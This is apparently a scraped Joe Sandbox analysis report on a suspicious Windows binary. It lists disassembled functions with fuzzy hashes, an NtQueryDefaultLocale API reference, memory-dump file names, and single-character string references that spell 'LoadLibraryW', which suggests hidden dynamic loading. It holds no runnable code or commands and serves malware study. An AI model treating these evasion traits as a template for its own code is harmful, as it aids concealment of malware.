Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
API String ID: 0-2457314740
Opcode ID: 8377a072d52f9ebfcfd7f54e9b34d00292ac500e2637e1ba882ce4bc64c59695
Instruction ID: 452740b263be536241ad283bf3e93c330d5add207dfb2093bca605b81ef60336
Opcode Fuzzy Hash: 8377a072d52f9ebfcfd7f54e9b34d00292ac500e2637e1ba882ce4bc64c59695
Instruction Fuzzy Hash: 22A1E4A1D092988EF720C624CC44BEA7B75EF92304F0441FAD48D6B282D77E1FD58B66

Function 004158C8 Relevance: 28.7, APIs: 2, Strings: 14, Instructions: 721
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
9HHF, xrefs: 004161CA
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 2949231068-813676002
Opcode ID: b21e9f2c2aec025707621089db2fa7c514515825e7bc86d2863a1a3f66048495
Instruction ID: 89fd3b04d2d4baae8646865ee7f87ad83dff50b2bf9fe7a18cfbcaf80e498f22
Opcode Fuzzy Hash: b21e9f2c2aec025707621089db2fa7c514515825e7bc86d2863a1a3f66048495
Instruction Fuzzy Hash: 5962DDB1E046688BEB248B14DC80BEABBB1EF85304F1481FAD84D67641D6785EC6CF56

Function 004153B1 Relevance: 28.7, APIs: 2, Strings: 14, Instructions: 674
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
9HHF, xrefs: 004161CA
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 2949231068-813676002
Opcode ID: 2c5a26717fc4dd8589f1bf549b5064ffc8d3bd0a6ed5b1668b52f1502dd1a3b9
Instruction ID: bfe099a527f20717cc112ed4ff80b82e44660bd6727fc85cc469a95e5c3239d1
Opcode Fuzzy Hash: 2c5a26717fc4dd8589f1bf549b5064ffc8d3bd0a6ed5b1668b52f1502dd1a3b9
Instruction Fuzzy Hash: A242D0B1D04668CBEB248B14DC84BEABBB5EB81314F1480FAD80D97681D63D5EC6CF56

Function 00415424 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 417
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
9HHF, xrefs: 004161CA
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 2949231068-813676002
Opcode ID: a3c4b2f644ab797c197770f81643419c2f7675c1f63a9f3c39a2cca32cd69fea
Instruction ID: ab020383999a283389cd67a6ff597167e4e1049f29cda5c4bfa3cafdda48b262
Opcode Fuzzy Hash: a3c4b2f644ab797c197770f81643419c2f7675c1f63a9f3c39a2cca32cd69fea
Instruction Fuzzy Hash: 55F101B2D086A88BE7208B24DC44BEABB75EB81300F1540FED44D57682D67D5EC6CB56

Function 004153B6 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 366
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
9HHF, xrefs: 004161CA
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 2949231068-813676002
Opcode ID: 8eda2831473bfe98f7c1474335967e37f3294c2d0b559b026ae08ee61f67e249
Instruction ID: dfe428614fd70bdd0cef406a9c2b7360cb8437dde5c0f67b8ddb5a57a438494e
Opcode Fuzzy Hash: 8eda2831473bfe98f7c1474335967e37f3294c2d0b559b026ae08ee61f67e249
Instruction Fuzzy Hash: EDD134B2D086A89BE7208B24DC44BEABB75EF81300F1141FED44D57682E67D5EC6CB16

Function 004153BD Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 366
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
9HHF, xrefs: 004161CA
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 2949231068-813676002
Opcode ID: 48904c32bebf4e72188fadc1ea8fd8092b2e07f98f90d98a46729c5ef5d9b14c
Instruction ID: 38d378ff760fc7cf00bfdc99d61b068728ee53e393d52e13f68f0f01335c8ffb
Opcode Fuzzy Hash: 48904c32bebf4e72188fadc1ea8fd8092b2e07f98f90d98a46729c5ef5d9b14c
Instruction Fuzzy Hash: 93D134B2D086A88BE7208B24DC44BEABB75EF81300F1141FED44D57682E67D5EC6CB16

Function 004153D1 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 358
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
9HHF, xrefs: 004161CA
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 2949231068-813676002
Opcode ID: a4bca64082aca161c6aafd6cf5861b1520f0f3b6e66235bfaa850e627100c707
Instruction ID: 6a14bf4a3eb04cae67c5b51e01bc356d3a9fc6386e4db02237bdbedde460ddb0
Opcode Fuzzy Hash: a4bca64082aca161c6aafd6cf5861b1520f0f3b6e66235bfaa850e627100c707
Instruction Fuzzy Hash: EBD123B2D086A88BE7208B24DC44BEABB75EF91300F1140FED44D57682E67D5EC6CB56

Function 004153FB Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 343
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
9HHF, xrefs: 004161CA
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 2949231068-813676002
Opcode ID: b529d1c7728bd555803ccc29e80a8c29973263c2cb7f125d19f27881f42af2be
Instruction ID: 5f5209ed909375d2139a258b2c59d0ee9bc9ae30a4be132ece142089bc88a00e
Opcode Fuzzy Hash: b529d1c7728bd555803ccc29e80a8c29973263c2cb7f125d19f27881f42af2be
Instruction Fuzzy Hash: B1D113B1D086A88BE7208B24DC44BEABB75EF92300F1540FED44D57682E67D4EC6CB16

Function 0041E805 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
C3>7, xrefs: 0041EF30
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: C3>7$CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 0-1595673557
Opcode ID: 5cfb5154d0ade87e123fb57decb367e7c11a00f00729d3ee4777719309c7e456
Instruction ID: d022b2152a70e6700430846171d83ef6987ce2c28b84a06d3bfb48d66a714060
Opcode Fuzzy Hash: 5cfb5154d0ade87e123fb57decb367e7c11a00f00729d3ee4777719309c7e456
Instruction Fuzzy Hash: 90129EB4D052688BEB24CB25CC90BEAB7B6FF85304F1481EAD84D97241D6399EC1CF55

Function 00414A30 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 344
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
9HHF, xrefs: 004161CA
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-813676002
Opcode ID: 7a3c6dcbb904aaa6f14cf38af0815618f52217235a12e8a03d86a4584ee1ac6c
Instruction ID: df25959187cdc0d00ec56647ca006b026fe1f554ef3b5b137ac4aef6aafe0e35
Opcode Fuzzy Hash: 7a3c6dcbb904aaa6f14cf38af0815618f52217235a12e8a03d86a4584ee1ac6c
Instruction Fuzzy Hash: 62D121B2D082A88BE7208B24DC44BEABB71EF91310F1580FED44D57682D67D5EC6CB56

Function 00416050 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
9HHF, xrefs: 004161CA
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-813676002
Opcode ID: 4ee90e9c2688beda314404b386caaa8f36aa6a0cc7e66dd9ef6e8dd4cfe5ad53
Instruction ID: 34e4525c590ddcfbfe39821ef2b45606b161f9d4a11c1f324315865f6483a5db
Opcode Fuzzy Hash: 4ee90e9c2688beda314404b386caaa8f36aa6a0cc7e66dd9ef6e8dd4cfe5ad53
Instruction Fuzzy Hash: 33C110B1E086A88BE7208B24DC44BEABB71EF91300F1580FED44D57682D6795FC6CB56

Function 0041612B Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
9HHF, xrefs: 004161CA
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-813676002
Opcode ID: 37d85fc23c7a52cfad42ff725224e54d8b3f6a147d698aa7b85ba97326a2d606
Instruction ID: 5cdbee90e8e9be711707fb62406c117affafcb95e78e99f747a3dcfd54370fdd
Opcode Fuzzy Hash: 37d85fc23c7a52cfad42ff725224e54d8b3f6a147d698aa7b85ba97326a2d606
Instruction Fuzzy Hash: 30A113B1D086A48AF7218B25DC447EABB71EF51300F0580FEC48D57682D67D4BC68B56

Function 00416246 Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 316COMMON

Download Yara Rule

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 2949231068-3635020934
Opcode ID: c422880fc17018e93efde1bc399ad1ed4e83bea3256ab74e471f716af8335900
Instruction ID: 3aeec92c3109fb574ea902bd1338bc9d1cbacae3b450ecab5661731baad3006d
Opcode Fuzzy Hash: c422880fc17018e93efde1bc399ad1ed4e83bea3256ab74e471f716af8335900
Instruction Fuzzy Hash: D7C1F2B1D042A88AEB208B25CC447EABBB1EF51300F1581FED44D97682E67D4BC6CF56

Function 00416468 Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 300COMMON

Download Yara Rule

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-3635020934
Opcode ID: f943e6d6021c3cf7b59e30fdd7bee4faca5fe32445c95ffd70ccb8126e4de506
Instruction ID: 8b635cbb95621562d18b193e08c002f6368445e3de0c633ddc3054a69fb55711
Opcode Fuzzy Hash: f943e6d6021c3cf7b59e30fdd7bee4faca5fe32445c95ffd70ccb8126e4de506
Instruction Fuzzy Hash: 8AC122B1D046A88BEB208B25DC44BEABB71EF51300F1181FEC44D97682D63D5BC68F5A

Function 00406413 Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 289COMMON

Download Yara Rule

Strings

W, xrefs: 004065D3
u@W, xrefs: 004063D2
r, xrefs: 004065B7
a, xrefs: 004065BE
y, xrefs: 004065CC
r, xrefs: 004065C5
o, xrefs: 0040658D
d, xrefs: 0040659B
L, xrefs: 004065A2
a, xrefs: 00406594
L, xrefs: 00406586
b, xrefs: 004065B0
i, xrefs: 004065A9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

